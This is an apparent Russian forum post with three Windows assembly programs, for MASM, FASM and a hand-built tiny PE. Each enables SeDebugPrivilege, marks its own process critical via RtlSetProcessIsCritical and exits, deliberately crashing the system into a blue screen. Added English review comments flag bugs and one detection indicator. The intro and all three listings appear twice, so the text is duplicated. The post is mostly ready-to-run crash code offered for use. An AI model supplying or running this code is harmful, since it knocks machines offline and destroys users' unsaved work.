VindictuS
05.07.2011, 13:37
Этот код демонстрирует вызов «синего экрана смерти» (BSOD).
Версия для MASM весит 1,0 КБ (stub); версия для FASM — 1,50 КБ; третий пример занимает 700 байт, поскольку заголовок EXE составлен вручную.
Работает только с правами администратора.
MASM (1.00 KB):
; ---------------------------------------------------------------------------
; Demo: mark the current process "critical" and then exit it.
; Target:  32-bit Windows, MASM32, stdcall.
; Flow:    RtlAdjustPrivilege(20 = SE_DEBUG_PRIVILEGE, Enable=1, CurrentThread=0, &old)
;          -> RtlSetProcessIsCritical(NewValue=1, OldValue=NULL, CheckFlag=0), resolved at runtime
;          -> ExitProcess; terminating a critical process is fatal to the system.
; The post states this only works as administrator: SeDebugPrivilege is normally
; present only in an elevated token, so the privilege step fails otherwise.
; Defender note: a user-mode process marking itself critical is a strong
; indicator worth alerting on, since it can no longer be stopped safely.
; ---------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap :none
; NOTE(review): the include paths below appear to have lost their backslashes
; when the post was copied (the MASM32 convention is \masm32\include\... and
; \masm32\lib\...); they will not resolve as written.
include masm32includekernel32.inc
include masm32includentdll.inc
includelib masm32libkernel32.lib
includelib masm32libntdll.lib
.code
LibName db "ntdll", 0                           ; module exporting RtlSetProcessIsCritical
ProcName db "RtlSetProcessIsCritical", 0        ; resolved via GetProcAddress instead of an import
start:
; eax = address of a scratch BOOLEAN that receives the privilege's previous state.
; NOTE(review): [esp+12] is not a local of this routine -- it points into the
; caller's stack; a real program should reserve its own slot instead.
lea eax, [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax       ; Privilege=20 (SE_DEBUG_PRIVILEGE), Enable=1, CurrentThread=0, Enabled=eax
; Arguments for RtlSetProcessIsCritical(1, NULL, 0), pushed right-to-left now.
; The two stdcall calls below remove their own arguments, so these three
; dwords are still on top of the stack when "call eax" runs.
push 0
push 0
push 1
invoke LoadLibrary, addr LibName                ; eax = HMODULE of ntdll (already loaded in every process)
invoke GetProcAddress, eax, addr ProcName       ; eax = address of RtlSetProcessIsCritical
call eax                                        ; RtlSetProcessIsCritical(1, NULL, 0)
; NOTE(review): no exit code is pushed, so ExitProcess reads whatever is on the
; stack as uExitCode; it only goes unnoticed because the exit is never observed.
call ExitProcess
end start
FASM (1.50 KB):
; ---------------------------------------------------------------------------
; Same demo for FASM: privilege -> critical -> exit.
; 32-bit PE, GUI subsystem; imports are resolved by the loader through the
; library/import macros from win32a.inc, and 'invoke' pushes arguments
; right-to-left and calls through the import table.
; ---------------------------------------------------------------------------
format PE GUI 4.0
include '..\!FASM\INCLUDE\win32a.inc'            ; provides invoke/library/import
; NOTE(review): no 'entry' directive is given; presumably execution starts at
; the first instruction below -- confirm against the assembler's defaults.
; NOTE(review): [esp+12] is used as the output slot for the privilege's previous
; state, but it is not a local of this code; it points into the caller's stack.
lea eax, dword [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax         ; Privilege=20 (SE_DEBUG_PRIVILEGE), Enable=1, CurrentThread=0, Enabled=eax
invoke RtlSetProcessIsCritical, 1, 0, 0          ; NewValue=1, OldValue=NULL, CheckFlag=0
invoke ExitProcess                               ; NOTE(review): no uExitCode argument is passed
section '.data' import data readable writeable
library ntdll, 'ntdll', kernel32, 'kernel32'
import ntdll, RtlAdjustPrivilege, 'RtlAdjustPrivilege', RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
import kernel32, ExitProcess, 'ExitProcess'
FASM, tiny version, 700 bytes:
; ---------------------------------------------------------------------------
; Hand-built 32-bit PE emitted with 'format binary': DOS stub, COFF and
; optional headers, one section, a minimal import directory, an empty
; relocation block, then the same three-call payload as the other listings.
; Numbers in the header comments are file offsets unless noted.
; ---------------------------------------------------------------------------
format binary as "EXE"
use32
; --- DOS (MZ) header ---
db "MZ"
dw $60, 1                               ; e_cblp, e_cp
db 0, 0, 2, 0                           ; e_crlc = 0, e_cparhdr = 2 (32-byte DOS header)
dw $1000, $1000, 0, 4160                ; e_minalloc, e_maxalloc, e_ss, e_sp
db 0, 0, 0, 0, 0, 0                     ; e_csum, e_ip, e_cs
dw $1C                                  ; e_lfarlc
; rest of the DOS header, a tiny real-mode stub at $20 (print the '$'-terminated
; message at $40, then exit), and e_lfanew at $3C = $60 -> the PE signature
db 0, 0, 0, 0, 0, 0, $0E, $1F, $B4, 9, $BA, $20, 0, $CD, $21, $B8, 1, $4C, $CD, $21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, $60, 0, 0, 0
db ".............................", $0D, $0A, $24, "PE", 0, 0  ; 32-byte stub message, then "PE\0\0" at $60
; --- COFF file header ---
dw $014C, 1                             ; Machine = i386, NumberOfSections = 1
dd 0, 0, 0                              ; TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
dw $00E0, $010E, $010B, 0               ; SizeOfOptionalHeader = 224, Characteristics, Magic = PE32, linker version
; --- optional header ---
; SizeOfCode/InitializedData/UninitializedData = 0, AddressOfEntryPoint = start,
; BaseOfCode/BaseOfData = 0, ImageBase = 0, SectionAlignment = $1000,
; FileAlignment = $200, OS/image/subsystem version words, Win32VersionValue = 0,
; SizeOfImage rounded up to a page, SizeOfHeaders = $200, CheckSum = 0.
; ImageBase = 0 together with the empty relocation block below appears to let
; the loader map the image anywhere; the code is written position-independent.
dd 0, 0, 0, (start), 0, 0, 0, $1000, $0200, 1, 0, 4, 0, ((llveryend+$0FFF) shr 12) shl 12, $0200, 0
dw 2, 0                                 ; Subsystem = GUI, DllCharacteristics = 0
dd $1000, $1000, $1000, 0, 0, 16        ; stack reserve/commit, heap reserve/commit, LoaderFlags, NumberOfRvaAndSizes
; --- data directories (16 entries) ---
dq 0                                    ; export: none
dd (llimpbeg), xximpsize                ; import directory
dq 3 dup(0)                             ; resource, exception, security: none
dd (llrelbeg), 8                        ; base relocations: one empty block
dq 10 dup(0)                            ; remaining directories unused
; --- single section header ---
db ".datasec"
dd (llveryend-start), $1000, (llveryend-start), $0200, 0, 0, 0, $60000020 ; VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, reloc/linenumber fields, Characteristics = CODE|EXECUTE|READ
db ($0200-$) dup(0)                     ; pad headers to FileAlignment
org $1000                               ; section contents are mapped at RVA $1000
; --- code: same flow as the MASM listing, with imports reached via ebx ---
start: cld
call refe
refe: pop esi                           ; esi = runtime address of 'refe'
lea ebx, [esi+(imp_center-refe)]        ; ebx = runtime address of imp_center; import slots are small displacements from it
; NOTE(review): [esp+12] is used as the output slot for the privilege's previous
; state, but it is not a local of this code; it points into the caller's stack.
lea eax, dword [esp+12]
push eax 0 1 20                         ; FASM multi-push, right-to-left: RtlAdjustPrivilege(20 = SE_DEBUG_PRIVILEGE, 1, 0, eax)
call dword [(RtlAdjustPrivilege-imp_center)+ebx]
push 0 0 1                              ; RtlSetProcessIsCritical(NewValue=1, OldValue=NULL, CheckFlag=0)
call dword [(RtlSetProcessIsCritical-imp_center)+ebx]
call dword [(ExitProcess-imp_center)+ebx] ; NOTE(review): no uExitCode is pushed
; --- import directory: two IMAGE_IMPORT_DESCRIPTORs plus terminator ---
llimpbeg:
dd 0, 0, 0, (kernel_name), (kernel_table) ; OriginalFirstThunk = 0, TimeDateStamp, ForwarderChain, Name, FirstThunk
dd 0, 0, 0, (ntdll_name), (ntdll_table)
; Terminator: only three zero dwords are emitted; its last two fields overlap
; the relocation block below (0, 8). NOTE(review): this presumably relies on
; the loader stopping at Name == 0 -- confirm.
dd 0, 0, 0
llrelbeg:
dd 0, 8                                 ; relocation block: VirtualAddress = 0, SizeOfBlock = 8, no entries
kernel_table:
ExitProcess: dd (_ExitProcess), 0       ; kernel32 IAT, filled by the loader, 0-terminated
imp_center:                             ; reference point for the displacements used in the code above
ntdll_table:
RtlAdjustPrivilege: dd (_RtlAdjustPrivilege)
RtlSetProcessIsCritical: dd (_RtlSetProcessIsCritical), 0   ; ntdll IAT, 0-terminated
kernel_name: db "kernel32", 0
ntdll_name: db "ntdll", 0
; Hint/name entries: a 2-byte hint followed by the name. Each name is
; terminated by the leading zero bytes of the next entry. NOTE(review): the
; last name has no explicit terminator and appears to rely on the loader
; zero-filling the rest of the page past llveryend -- confirm.
_ExitProcess: db 0, 0, "ExitProcess"
_RtlAdjustPrivilege: db 0, 0, "RtlAdjustPrivilege"
_RtlSetProcessIsCritical: db 0, 0, "RtlSetProcessIsCritical"
xximpsize = ($ - llimpbeg)              ; import directory size recorded in the data directory
llveryend:
Версия для MASM весит 1,0 КБ (stub); версия для FASM — 1,50 КБ; третий пример занимает 700 байт, поскольку заголовок EXE составлен вручную.
Работает только с правами администратора.
MASM (1.00 KB):
; ---------------------------------------------------------------------------
; Demo: mark the current process "critical" and then exit it.
; Target:  32-bit Windows, MASM32, stdcall.
; Flow:    RtlAdjustPrivilege(20 = SE_DEBUG_PRIVILEGE, Enable=1, CurrentThread=0, &old)
;          -> RtlSetProcessIsCritical(NewValue=1, OldValue=NULL, CheckFlag=0), resolved at runtime
;          -> ExitProcess; terminating a critical process is fatal to the system.
; The post states this only works as administrator: SeDebugPrivilege is normally
; present only in an elevated token, so the privilege step fails otherwise.
; Defender note: a user-mode process marking itself critical is a strong
; indicator worth alerting on, since it can no longer be stopped safely.
; ---------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap :none
; NOTE(review): the include paths below appear to have lost their backslashes
; when the post was copied (the MASM32 convention is \masm32\include\... and
; \masm32\lib\...); they will not resolve as written.
include masm32includekernel32.inc
include masm32includentdll.inc
includelib masm32libkernel32.lib
includelib masm32libntdll.lib
.code
LibName db "ntdll", 0                           ; module exporting RtlSetProcessIsCritical
ProcName db "RtlSetProcessIsCritical", 0        ; resolved via GetProcAddress instead of an import
start:
; eax = address of a scratch BOOLEAN that receives the privilege's previous state.
; NOTE(review): [esp+12] is not a local of this routine -- it points into the
; caller's stack; a real program should reserve its own slot instead.
lea eax, [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax       ; Privilege=20 (SE_DEBUG_PRIVILEGE), Enable=1, CurrentThread=0, Enabled=eax
; Arguments for RtlSetProcessIsCritical(1, NULL, 0), pushed right-to-left now.
; The two stdcall calls below remove their own arguments, so these three
; dwords are still on top of the stack when "call eax" runs.
push 0
push 0
push 1
invoke LoadLibrary, addr LibName                ; eax = HMODULE of ntdll (already loaded in every process)
invoke GetProcAddress, eax, addr ProcName       ; eax = address of RtlSetProcessIsCritical
call eax                                        ; RtlSetProcessIsCritical(1, NULL, 0)
; NOTE(review): no exit code is pushed, so ExitProcess reads whatever is on the
; stack as uExitCode; it only goes unnoticed because the exit is never observed.
call ExitProcess
end start
FASM (1.50 KB):
; ---------------------------------------------------------------------------
; Same demo for FASM: privilege -> critical -> exit.
; 32-bit PE, GUI subsystem; imports are resolved by the loader through the
; library/import macros from win32a.inc, and 'invoke' pushes arguments
; right-to-left and calls through the import table.
; ---------------------------------------------------------------------------
format PE GUI 4.0
include '..\!FASM\INCLUDE\win32a.inc'            ; provides invoke/library/import
; NOTE(review): no 'entry' directive is given; presumably execution starts at
; the first instruction below -- confirm against the assembler's defaults.
; NOTE(review): [esp+12] is used as the output slot for the privilege's previous
; state, but it is not a local of this code; it points into the caller's stack.
lea eax, dword [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax         ; Privilege=20 (SE_DEBUG_PRIVILEGE), Enable=1, CurrentThread=0, Enabled=eax
invoke RtlSetProcessIsCritical, 1, 0, 0          ; NewValue=1, OldValue=NULL, CheckFlag=0
invoke ExitProcess                               ; NOTE(review): no uExitCode argument is passed
section '.data' import data readable writeable
library ntdll, 'ntdll', kernel32, 'kernel32'
import ntdll, RtlAdjustPrivilege, 'RtlAdjustPrivilege', RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
import kernel32, ExitProcess, 'ExitProcess'
FASM, tiny version, 700 bytes:
; ---------------------------------------------------------------------------
; Hand-built 32-bit PE emitted with 'format binary': DOS stub, COFF and
; optional headers, one section, a minimal import directory, an empty
; relocation block, then the same three-call payload as the other listings.
; Numbers in the header comments are file offsets unless noted.
; ---------------------------------------------------------------------------
format binary as "EXE"
use32
; --- DOS (MZ) header ---
db "MZ"
dw $60, 1                               ; e_cblp, e_cp
db 0, 0, 2, 0                           ; e_crlc = 0, e_cparhdr = 2 (32-byte DOS header)
dw $1000, $1000, 0, 4160                ; e_minalloc, e_maxalloc, e_ss, e_sp
db 0, 0, 0, 0, 0, 0                     ; e_csum, e_ip, e_cs
dw $1C                                  ; e_lfarlc
; rest of the DOS header, a tiny real-mode stub at $20 (print the '$'-terminated
; message at $40, then exit), and e_lfanew at $3C = $60 -> the PE signature
db 0, 0, 0, 0, 0, 0, $0E, $1F, $B4, 9, $BA, $20, 0, $CD, $21, $B8, 1, $4C, $CD, $21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, $60, 0, 0, 0
db ".............................", $0D, $0A, $24, "PE", 0, 0  ; 32-byte stub message, then "PE\0\0" at $60
; --- COFF file header ---
dw $014C, 1                             ; Machine = i386, NumberOfSections = 1
dd 0, 0, 0                              ; TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
dw $00E0, $010E, $010B, 0               ; SizeOfOptionalHeader = 224, Characteristics, Magic = PE32, linker version
; --- optional header ---
; SizeOfCode/InitializedData/UninitializedData = 0, AddressOfEntryPoint = start,
; BaseOfCode/BaseOfData = 0, ImageBase = 0, SectionAlignment = $1000,
; FileAlignment = $200, OS/image/subsystem version words, Win32VersionValue = 0,
; SizeOfImage rounded up to a page, SizeOfHeaders = $200, CheckSum = 0.
; ImageBase = 0 together with the empty relocation block below appears to let
; the loader map the image anywhere; the code is written position-independent.
dd 0, 0, 0, (start), 0, 0, 0, $1000, $0200, 1, 0, 4, 0, ((llveryend+$0FFF) shr 12) shl 12, $0200, 0
dw 2, 0                                 ; Subsystem = GUI, DllCharacteristics = 0
dd $1000, $1000, $1000, 0, 0, 16        ; stack reserve/commit, heap reserve/commit, LoaderFlags, NumberOfRvaAndSizes
; --- data directories (16 entries) ---
dq 0                                    ; export: none
dd (llimpbeg), xximpsize                ; import directory
dq 3 dup(0)                             ; resource, exception, security: none
dd (llrelbeg), 8                        ; base relocations: one empty block
dq 10 dup(0)                            ; remaining directories unused
; --- single section header ---
db ".datasec"
dd (llveryend-start), $1000, (llveryend-start), $0200, 0, 0, 0, $60000020 ; VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, reloc/linenumber fields, Characteristics = CODE|EXECUTE|READ
db ($0200-$) dup(0)                     ; pad headers to FileAlignment
org $1000                               ; section contents are mapped at RVA $1000
; --- code: same flow as the MASM listing, with imports reached via ebx ---
start: cld
call refe
refe: pop esi                           ; esi = runtime address of 'refe'
lea ebx, [esi+(imp_center-refe)]        ; ebx = runtime address of imp_center; import slots are small displacements from it
; NOTE(review): [esp+12] is used as the output slot for the privilege's previous
; state, but it is not a local of this code; it points into the caller's stack.
lea eax, dword [esp+12]
push eax 0 1 20                         ; FASM multi-push, right-to-left: RtlAdjustPrivilege(20 = SE_DEBUG_PRIVILEGE, 1, 0, eax)
call dword [(RtlAdjustPrivilege-imp_center)+ebx]
push 0 0 1                              ; RtlSetProcessIsCritical(NewValue=1, OldValue=NULL, CheckFlag=0)
call dword [(RtlSetProcessIsCritical-imp_center)+ebx]
call dword [(ExitProcess-imp_center)+ebx] ; NOTE(review): no uExitCode is pushed
; --- import directory: two IMAGE_IMPORT_DESCRIPTORs plus terminator ---
llimpbeg:
dd 0, 0, 0, (kernel_name), (kernel_table) ; OriginalFirstThunk = 0, TimeDateStamp, ForwarderChain, Name, FirstThunk
dd 0, 0, 0, (ntdll_name), (ntdll_table)
; Terminator: only three zero dwords are emitted; its last two fields overlap
; the relocation block below (0, 8). NOTE(review): this presumably relies on
; the loader stopping at Name == 0 -- confirm.
dd 0, 0, 0
llrelbeg:
dd 0, 8                                 ; relocation block: VirtualAddress = 0, SizeOfBlock = 8, no entries
kernel_table:
ExitProcess: dd (_ExitProcess), 0       ; kernel32 IAT, filled by the loader, 0-terminated
imp_center:                             ; reference point for the displacements used in the code above
ntdll_table:
RtlAdjustPrivilege: dd (_RtlAdjustPrivilege)
RtlSetProcessIsCritical: dd (_RtlSetProcessIsCritical), 0   ; ntdll IAT, 0-terminated
kernel_name: db "kernel32", 0
ntdll_name: db "ntdll", 0
; Hint/name entries: a 2-byte hint followed by the name. Each name is
; terminated by the leading zero bytes of the next entry. NOTE(review): the
; last name has no explicit terminator and appears to rely on the loader
; zero-filling the rest of the page past llveryend -- confirm.
_ExitProcess: db 0, 0, "ExitProcess"
_RtlAdjustPrivilege: db 0, 0, "RtlAdjustPrivilege"
_RtlSetProcessIsCritical: db 0, 0, "RtlSetProcessIsCritical"
xximpsize = ($ - llimpbeg)              ; import directory size recorded in the data directory
llveryend: